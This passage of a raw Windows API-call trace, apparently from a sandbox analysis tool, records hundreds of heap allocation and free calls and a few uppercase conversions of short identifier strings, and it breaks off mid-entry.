[0122.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0122.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0122.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0122.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x98c4) returned 0x2aaf410 [0122.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0122.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0122.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0122.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0122.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x98c4) returned 0x2a9a140 [0122.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0122.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0122.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0122.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0122.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0122.282] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0122.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0122.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x98c4) returned 0x2a9a140 [0122.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a58 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0122.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b28 [0122.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0122.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0122.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a68 [0122.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0122.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0122.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0122.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa000 [0122.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0122.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0122.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0122.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0122.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0122.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0122.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0122.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x98c4) returned 0x2ab8ce0 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0122.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0122.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0122.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0122.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0122.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0122.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0122.285] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0122.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0122.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0122.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0122.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0122.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0122.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0122.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0122.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0122.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0122.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0122.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0122.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0122.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0122.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0122.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0122.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0122.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0122.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0122.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0122.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0122.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0122.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0122.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0122.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0122.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0122.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0122.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0122.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0122.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0122.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0122.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0122.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0122.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0122.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0122.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0122.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0122.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0122.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0122.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0122.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0122.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.326] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0122.326] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0122.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0122.327] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0122.327] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a746b8 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0122.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0122.328] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0122.328] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: 